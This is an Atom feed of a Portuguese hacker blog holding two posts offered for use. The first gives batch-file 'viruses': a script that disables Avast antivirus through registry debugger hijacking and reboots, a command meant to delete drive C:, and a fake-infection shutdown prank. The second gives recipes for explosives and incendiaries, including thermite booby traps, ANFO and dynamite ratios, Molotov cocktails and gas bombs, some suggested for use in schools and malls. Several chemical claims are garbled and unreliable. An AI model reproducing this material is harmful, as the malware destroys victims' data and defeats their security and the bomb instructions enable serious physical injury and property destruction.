<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;C0AHQHYyeCp7ImA9WhRVEEg.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771</id><updated>2012-01-08T11:42:11.890-08:00</updated><category term="*" /><category term="." /><title>'                                      .                         Hacker Brasil .'</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://headplay.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>45</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/blogspot/fYGk" /><feedburner:info uri="blogspot/fygk" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>blogspot/fYGk</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;DkYBR348fSp7ImA9WhZSEEU.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-2145395871476935234</id><published>2011-03-25T13:15:00.000-07:00</published><updated>2011-03-25T13:15:56.075-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-25T13:15:56.075-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="." /><title>Criando Virus !</title><content type="html">&lt;div _extended="true" class="box wsw"&gt; &lt;div _extended="true" class="boxContentBorder"&gt; &lt;div _extended="true" class="boxContent"&gt; &lt;h1 _extended="true"&gt;Codigos de Virus&lt;/h1&gt;&lt;div _extended="true"&gt;Pessoal estarei mostrando para vcs alguns comandos que podem  ser utilizados como virus esses comandos são salvos em linguagem .BAT&lt;/div&gt;&lt;div _extended="true"&gt;qua nao exige conhecimento de programção, Voce pode usar o  propio Bloco de notas do windows ou qualquer editor de textos que vc tiver &lt;/div&gt;&lt;div _extended="true"&gt;e so colar os codigos e salvar com .BAT ou .CMD no final do  nome do arquivo (Ex:&amp;nbsp; Alguma coisa.bat)&lt;/div&gt;&lt;div _extended="true"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div _extended="true"&gt;1º AVASTKill&amp;nbsp; - HeadPlay&lt;/div&gt;&lt;div _extended="true"&gt;Como o Nome sugere esse BAT Deleta o AVAST um dos mais  usados AntiVirus&amp;nbsp; do mercado&lt;/div&gt;&lt;div _extended="true"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;h4 _extended="true"&gt;@Title AVKill - Kouback_T-H4CK3R &lt;/h4&gt;&lt;h4 _extended="true"&gt;#echo off&lt;br _extended="true" /&gt;start Reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\ashDisp.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Image File Execution Options\aswupdsv.exe" /v "Debugger" /t  "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\ashserv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Image File Execution Options\ashMaisv.exe" /v "Debugger" /t  "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\ash***sv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Image File Execution Options\ashQuick.exe" /v "Debugger" /t  "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\sched.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Image File Execution Options\ashAvast.exe" /v "Debugger" /t  "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\VisthUpd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Image File Execution Options\AVASTSS.scr" /v "Debugger" /t  "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\ashSimpl.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Image File Execution Options\ashCmd.exe" /v "Debugger" /t  "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\ashSimp2.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Image File Execution Options\ashEnhcd.exe" /v "Debugger" /t  "REG_SZ" /d "ntsd -d" /f&lt;br _extended="true" /&gt;shutdown -f -r -t 0&lt;/h4&gt;&lt;div _extended="true"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div _extended="true"&gt;2º Adeus Windows.&lt;/div&gt;&lt;div _extended="true"&gt;Este comando e pra fuder mesmo o&amp;nbsp;&lt;/div&gt;&lt;div _extended="true"&gt;PC entao de maneira aulguma  execute ele &lt;/div&gt;&lt;div _extended="true"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;h4 _extended="true"&gt;&lt;span _extended="true" class="GJ-RHBEBE1 ugc"&gt;@ECHO OFF&lt;br _extended="true" /&gt;@BREAK OFF&lt;br _extended="true" /&gt;deltree/C: Y\*.* &lt;/span&gt;&lt;/h4&gt;&lt;h4 _extended="true"&gt;&amp;nbsp;&lt;/h4&gt;&lt;div _extended="true"&gt;2º Pegadinha do malandro .&lt;/div&gt;&lt;div _extended="true"&gt;Este um mais uma brincadeira nao e um virus de verdade mais  e&amp;nbsp;&lt;/div&gt;&lt;div _extended="true"&gt;divertido, e o famoso Shutdown -s&lt;/div&gt;&lt;div _extended="true"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;h4 _extended="true"&gt;@title A VACA FOI PRO BREJO By Headplay !kkkkkkk'a&lt;/h4&gt;&lt;h4 _extended="true"&gt;@Echo off&lt;/h4&gt;&lt;h4 _extended="true"&gt;ECHO: PC INFECTED!!!!&lt;/h4&gt;&lt;h4 _extended="true"&gt;shutdown -s -t 5 -c "Pegadinha do Malandro"&lt;/h4&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-2145395871476935234?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/lCgBYsT0QHVv85f6NodSSFGqEBA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/lCgBYsT0QHVv85f6NodSSFGqEBA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/lCgBYsT0QHVv85f6NodSSFGqEBA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/lCgBYsT0QHVv85f6NodSSFGqEBA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/pL3SAp3uIU8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/2145395871476935234/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/criando-virus.html#comment-form" title="2 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2145395871476935234?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2145395871476935234?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/pL3SAp3uIU8/criando-virus.html" title="Criando Virus !" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>2</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/criando-virus.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUcGSHc4fSp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-7620616279836996520</id><published>2011-03-24T06:15:00.000-07:00</published><updated>2011-03-24T07:30:29.935-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T07:30:29.935-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Bombas .!</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'times new roman';"&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u&gt;&lt;h2&gt;&lt;center&gt;&lt;span style="color: red;"&gt;Disquete Bomba&lt;/span&gt;&lt;/center&gt;&lt;/h2&gt;&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style="color: red;"&gt;&lt;span style="color: white;"&gt;Você precisa de:&lt;br /&gt;
* 1 ou mais discos de 3.5 polegadas;&lt;br /&gt;
* Uma caixa de fósforo, azul ou branco SOMENTE!;&lt;br /&gt;
* Um estilete bem afiado;&lt;br /&gt;
* Um frasco de cimento plástico ou argamassa;&lt;br /&gt;
* Um centímetro de magnésio em tiras (opcional);&lt;br /&gt;
* Uma grama de termite. Mistura de alumínio pulverizado e óxido de ferro, usada na produção do aço (opcional).&lt;br /&gt;
Instruções:&lt;br /&gt;
Abra cuidadosamente o diquete. Com o disco aberto você tem que escolher entre arrancar a proteção onde fica a marca do disco (normalmente de metal), ou deixar ela no lugar. Se a proteção for arrancada, a bomba vai ficar visível e você mesmo terá de colocá-la no drive. Se a proteção ficar no lugar, você pode dar o disco para um "amigo". Raspe a cabeça dos fósforos e amasse para que vire um pó. Retire o pano do disquete e cubra um ou ambos os lados do disco com a argamassa. Espalhe o pó dos fósforos em cima e deixe secar. Feche o disco colando os cantos e pronto! Se você quiser um estrago maior, coloque a tira de magnésio em cima do pó dos fósforos. Se você quiser destruir o computador, coloque o termite.Funcionamento:&lt;br /&gt;
Quando o disco for acessado o pó dos fósforos irá atritar e acender. O disco vai derreter e se espalhar pelo drive. Se você usou o magnésio, o calor gerado pelos fósforos vai acender a tira. O magnésio vai queimar destruindo o drive permanentemente e, com sorte, outras coisas mais que estiverem por perto. Se você usou o magnésio e o termite juntos, o magnésio irá acender o termite e ele vai começar a agir. O termite vai queimar o disco, o drive, o gabinete, a mesa, o chão e vai pingar em algum lugar perto do Japão. Eu não sou responsável pelos seus atos. Corra seus próprios riscos.&lt;/span&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;center&gt;&lt;u style="text-decoration: none;"&gt;&lt;h2&gt;&lt;span class="Apple-style-span"&gt;Bomba de Cigarro&lt;/span&gt;&lt;/h2&gt;&lt;/u&gt;&lt;/center&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;Material:&lt;br /&gt;
* Um cigarro e uma bomba de São João.&lt;br /&gt;
Instruções&lt;br /&gt;
Pegue um cigarro. Arranque a bituca (a parte que se põe na boca). Depois, pegue a bomba e encaixe o pavio no cigarro. Ascenda, depois de alguns minutos... BUM..&lt;br /&gt;
Funcionamento&lt;br /&gt;
O cigarro irá sendo queimado depois de alguns minutos... BUM... Este tipo de bomba é bom para escolas e shoppings. O poder de destruição depende do tamanho da bomba que vc vai usar.&lt;/span&gt;&lt;u&gt;&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u&gt;&lt;span style="color: red;"&gt;&lt;center&gt;&lt;h2&gt;Bomba de bola de tênis&lt;/h2&gt;&lt;/center&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Material:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;* Uma bola de tênis, dezenas de cabeças de fósforos (de cabeça azul ou branca SOMENTE) e fita adesiva bem forte.&lt;br /&gt;
Instruções&lt;br /&gt;
Faça um buraco na bola de tênis. Raspe as cabeças dos fósforos e amasse para que virem pó. Encha a bola de tênis com esse pó, fazendo com que ela fique totalmente maciça. Enrole a bolinha bem forte com a fita adesiva. Atire a bola o mais forte possível no alvo.&lt;br /&gt;
Funcionamento&lt;/span&gt;&lt;span style="color: white;"&gt;O pó do fósforo irá atritar, acender e explodir. Se a bola estiver totalmente cheia, a explosão poderá derrubar um muro.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;u&gt;&lt;center&gt;&lt;h2&gt;CHUD&lt;/h2&gt;&lt;/center&gt;&lt;/u&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Material:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;* Farinha de trigo e qualquer líquido inflamável.&lt;br /&gt;
Instruções&lt;br /&gt;
Misture em uma tigela os ingredientes na proporção de 2/3 de farinha de trigo para 1/3 do líquido inflamável, até que vire uma massa consistente. Para o líquido é recomendável uma substância de baixa evaporação como removedor ou gasolina.&lt;br /&gt;
Funcionamento&lt;br /&gt;
Chud é muito usado para acender substâncias de difícil combustão como magnésio e outras, ou bombas que necessitam de tempo para explodir como a bomba de Carbonato de Cálcio. O CHUD não é uma bomba.&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;br /&gt;
&lt;center&gt;&lt;h2&gt;Dinamite Extra&lt;/h2&gt;&lt;/center&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="color: white;"&gt;Material:&lt;br /&gt;
** Nitroglicerina, Nitrato de Amônia, Colódio e Carvão.**&lt;br /&gt;
Instruções&lt;br /&gt;
FÓRMULA I - Misture numa vasilha : 71% de Nitroglicerina, 23% de Nitrato de Amônia, 4% de Colódio e 1% de Carvão.&lt;br /&gt;
FÓRMULA II - Misture numa vasilha : 62% de Nitrato de Amônia 25% de Nitroglicerina, 12% de Carvão e 1% de Colódio.&lt;br /&gt;
Funcionamento&lt;br /&gt;
Use uma cápsula explosiva (espoleta um pouco mais forte) qualquer para detonar a bomba.&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;u&gt;&lt;center&gt;&lt;h2&gt;Bomba de Gelo Seco&lt;/h2&gt;&lt;/center&gt;&lt;/u&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Material:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;* Uma garrafa de vidro ou plástico Água Gelo Seco.&lt;br /&gt;
Instruções&lt;br /&gt;
Encha a garrafa com água até quase a boca. Complete com gelo seco, tampe e corra.&lt;br /&gt;
Funcionamento&lt;/span&gt;&lt;span style="color: white;"&gt;O gelo seco reage com a água e volta a forma gasosa expandindo seu volume. A pressão interna aumenta e a garrafa explode!&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;nbsp;0&lt;/span&gt;&lt;span style="color: lightblue;"&gt;:&lt;/span&gt;&lt;span style="color: white;"&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;h2&gt;ANFOS&lt;/h2&gt;&lt;/u&gt;&lt;/span&gt;&lt;/center&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="color: white;"&gt;Material:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;Querosene ou óleo de motor, Nitrato de Amônia e Uma Bacia.&lt;br /&gt;
Instruções&lt;br /&gt;
Misture na bacia, 94% de nitrato de amônia com 6% de querosene ou óleo.&lt;br /&gt;
Funcionamento&lt;/span&gt;&lt;span style="color: white;"&gt;ANFOS é um explosivo comercial de alto poder destrutivo, que pode substituir o M-80 ou M-60 das minas e outras bombas. A vantagem do ANFOS é seu baixíssimo custo.&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u&gt;&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style="color: red;"&gt;&lt;center&gt;&lt;u&gt;&lt;/u&gt;&lt;h2&gt;&lt;u&gt;Bomba de Impacto&lt;/u&gt;&lt;/h2&gt;&lt;/center&gt;&lt;span style="color: white;"&gt;Material:&lt;br /&gt;
Uma bola de gude, pólvora, um saco plástico e Linha ou Barbante.&lt;br /&gt;
Instruções&lt;br /&gt;
Recorte um pedacinho do plástico que seja suficiente para embrulhar a bola de gude. Coloque um pouco de pólvora em cima do plástico, coloque a bola em cima da pólvora e embrulhe-a com o plástico. Amarre a ponta com barbante, fazendo com que fique bem firme para a pólvora não sair. Para detonar, joque a bomba em alguma superfície dura.&lt;br /&gt;
Funcionamento&lt;br /&gt;
Quando a bomba bate na superfície dura, a bola de gude espreme a pólvora fazendo com que estoure. A explosão é bem forte mesmo com pouca pólvora, então tome cuidado pois a bola é espatifada e voam pedaços de vidros por todos os lados.&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;br /&gt;
&lt;center&gt;&lt;h2&gt;Bomba de Carboneto&lt;/h2&gt;&lt;/center&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="color: white;"&gt;Material:&lt;br /&gt;
Carboneto de Cálcio, um pote de vidro com tampa e Água.&lt;br /&gt;
Instruções&lt;br /&gt;
Encha o vidro com água. Coloque o Carboneto de Cálcio no vidro e tampe. Deixe no chão e saia correndo. Corra MESMO !!! Este tipo de bomba é muito PERIGOSA.&lt;br /&gt;
Funcionamento&lt;/span&gt;&lt;span style="color: white;"&gt;O Carboneto vai reagir com a água e formar um gás inflamável chamado Carbonato de Acetileno. A pressão no pote de vidro irá aumentar e o pote irá estourar. Se você quiser um maior estrago, deixe um pedaço de pano queimando por perto. O vidro estoura, a Acetileno atinge a chama e explode formando uma bola de fogo.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;center&gt;&lt;u&gt;&lt;h2&gt;Coquetel Molotov&lt;/h2&gt;&lt;/u&gt;&lt;/center&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="color: white;"&gt;Material:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;Uma garrafa de vidro&lt;br /&gt;
Gasolina&lt;br /&gt;
Óleo de Motor&lt;br /&gt;
Um pedaço de pano&lt;br /&gt;
Fita adesiva&lt;br /&gt;
Uma Rolha&lt;br /&gt;
Instruções&lt;br /&gt;
Encha a garrafa com gasolina e o óleo de motor em partes iguais. Coloque o pano na boca (da garrafa, não na sua) e prenda com a rolha. Reforce o pano com a fita adesiva para ficar bem preso, acenda e atire em seu alvo.&lt;br /&gt;
Funcionamento&lt;br /&gt;
É bem simples : a garrafa bate no chão, quebra e a gasolina se espalha. O pano em chamas encosta na gasolina e acende-a. O óleo serve para ajudar a queimar a gasolina que espirra e para o fogo durar mais tempo, proporcionando um maior estrago.&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;br /&gt;
&lt;center&gt;&lt;h2&gt;APERFEIÇOAMENTO : SEM FOGO&lt;/h2&gt;&lt;/center&gt;&lt;/u&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Esta variação é um pouco mais complicada e perigosa, mas o poder de destruição é maior.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;Material:&lt;br /&gt;
Uma garrafa de vidro, um pedaço de pano e um tablete de cloro.&lt;br /&gt;
Instruções&lt;br /&gt;
Encha a garrafa até a metade com gasolina. Embrulhe o tablete de cloro com o pano e enfie na boca da garrafa. O tablete é um pouco maior que a boca, então você deve forçar um pouco. O tablete NÃO deve cair na gasolina, ele deve ficar preso no gargalo. Não vire muito a garrafa. Para detonar atire a garrafa em alguma coisa sólida.&lt;br /&gt;
Funcionamento&lt;/span&gt;&lt;span style="color: white;"&gt;Quando a garrafa bate no chão e se quebra, o tablete de cloro entra em contato com a gasolina e explode. Primeiro explode e depois pega fogo. Esse tipo de coquetel é o mais forte de todos, portanto cuidado.&lt;/span&gt;&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;u&gt;&lt;br /&gt;
&lt;center&gt;&lt;h2&gt;VARIAÇÃO SEM ÓLEO&lt;/h2&gt;&lt;/center&gt;&lt;/u&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Esta variação é bem simples. Em vez de colocar metade gasolina e metade óleo, encha a garrafa com gasolina. A explosão é maior e o fogo se espalha mais, só que ele vai durar bem menos do que com o óleo.&lt;/span&gt;&lt;u&gt;&lt;br /&gt;
&lt;center&gt;&lt;span style="color: red;"&gt;&lt;h2&gt;VARIAÇÃO COM PICHE&lt;/h2&gt;&lt;/span&gt;&lt;/center&gt;&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Esta variação também é bem simples. No lugar do óleo coloque o piche, ou alcatrão. O piche vai queimar e demorar ainda mais para apagar.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;u&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u&gt;&lt;center&gt;&lt;h2&gt;VARIAÇÃO COM CERA&lt;/h2&gt;&lt;/center&gt;&lt;/u&gt;&lt;/span&gt;&lt;span style="color: white;"&gt;&lt;/span&gt;&lt;span style="color: white;"&gt;Outra variação simples. No lugar do óleo coloque cera fundida. A cera ajuda a queimar, prolongando as chamas.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;center&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;u&gt;&lt;h2&gt;&lt;span style="color: red;"&gt;Bomba de Efeitos Especiais&lt;/span&gt;&lt;/h2&gt;&lt;/u&gt;&lt;/center&gt;&lt;u&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Material:&lt;br /&gt;
Um pote não muito alto mas com boca bem larga, uma vela curta, álcool e Óleo de Motor (opcional).&lt;br /&gt;
Instruções&lt;br /&gt;
Cole a vela no meio do fundo do pote e faça com que fique bem firme. Despeje álcool no pote até que fique de um a dois centímetros do pavio da vela. Acenda a vela com muito cuidado e corra.&lt;br /&gt;
Funcionamento&lt;/span&gt;&lt;span style="color: white;"&gt;Quando a vela derreter e o pavio chegar no álcool, a bomba explodirá. O álcool é uma substância de combustão rápida. Como o pote é de boca larga, o álcool queima ainda mais rápido, formando somente uma grande bola de fogo como é visto nos filmes. O poder de destruição dessa bomba é muito pequeno, mas assusta. Se você quiser deixar a bomba mais real, adicione óleo de motor ao álcool. O óleo quando queima libera uma fumaça preta e dá a impressão de destruição.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;center&gt;&lt;u&gt;&lt;h2&gt;Bomba de Desinfetante&lt;/h2&gt;&lt;/u&gt;&lt;/center&gt;&lt;u&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Material:&lt;br /&gt;
Uma garrafa de plástico com tampa, desinfetante e aço em folhas.&lt;br /&gt;
Instruções&lt;br /&gt;
Coloque as folhas de aço na garrafa. Encha com desinfetante e tampe o mais rápido possível. Deixe no chão e corra.&lt;br /&gt;
Funcionamento&lt;br /&gt;
O desinfetante reage com o metal, liberando gases. A pressão dentro da garrafa aumenta e ela explode.&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;span style="color: red;"&gt;&lt;h2&gt;&lt;u&gt;Bomba de Cloro&lt;/u&gt;&lt;/h2&gt;&lt;/span&gt;&lt;/center&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Material:&lt;br /&gt;
Cloro com Hipocloreto de Sódio, água, açúcar e uma garrafa de dois litros.&lt;br /&gt;
Instruções&lt;br /&gt;
Misture o cloro, a água e o açúcar em partes iguais. Encha mais ou menos 1/10 da garrafa com a mistura. Deixe no chão e corra.&lt;br /&gt;
Funcionamento&lt;br /&gt;
As substâncias reagem e soltam gases. A pressão dentro da garrafa aumenta e ela explode.&lt;/span&gt;&lt;br /&gt;
&lt;center&gt;&lt;span style="color: red;"&gt;&lt;h2&gt;&lt;u&gt;Dinamite GUHR&lt;/u&gt;&lt;/h2&gt;&lt;/span&gt;&lt;/center&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;Material&lt;br /&gt;
Nitroglicerina e Kieselgur (farinha fóssil).&lt;br /&gt;
Instruções&lt;br /&gt;
Misture cuidadosamente 3 partes de nitroglicerina com 1 parte de Kieselgur. Quando formar uma massa consistente está pronto. Antes de usar, teste a massa jogando pequenas quantidades no chão.&lt;br /&gt;
Funcionamento&lt;br /&gt;
Esta massa é apropriada para destruir instalações previamente visitadas. Você leva o explosivo, deixa perto de uma porta ou um pilar de sustentação, se afasta e atira. O explosivo pode estar congelado ou não, tanto faz, mas congelado o manuseio é mais fácil. Você pode usar também, atirando-a para o alto, pois o choque contra o chão é suficiente para detoná-la.&lt;/span&gt;&lt;br /&gt;
&lt;center&gt;&lt;span style="color: red;"&gt;&lt;h2&gt;&lt;u&gt;Bomba de Fumaça&lt;/u&gt;&lt;/h2&gt;&lt;/span&gt;&lt;/center&gt;&lt;span style="color: red;"&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style="color: white;"&gt;Material&lt;br /&gt;
Açúcar, Nitrato de Potássio e um pote com a boca larga.&lt;br /&gt;
Instruções&lt;br /&gt;
Junte 4 partes de açúcar com 6 partes de Nitrato de Potássio numa panela. Esquente em fogo baixo e mexa bem até derreter tudo. Coloque a mistura no pote e, antes de solidificar, jogue alguns fósforos acesos para funcionar como pavio.&lt;br /&gt;
Funcionamento&lt;br /&gt;
O fósforo queima e acende a mistura. Acontecem reações químicas e a fumaça é liberada&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-7620616279836996520?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
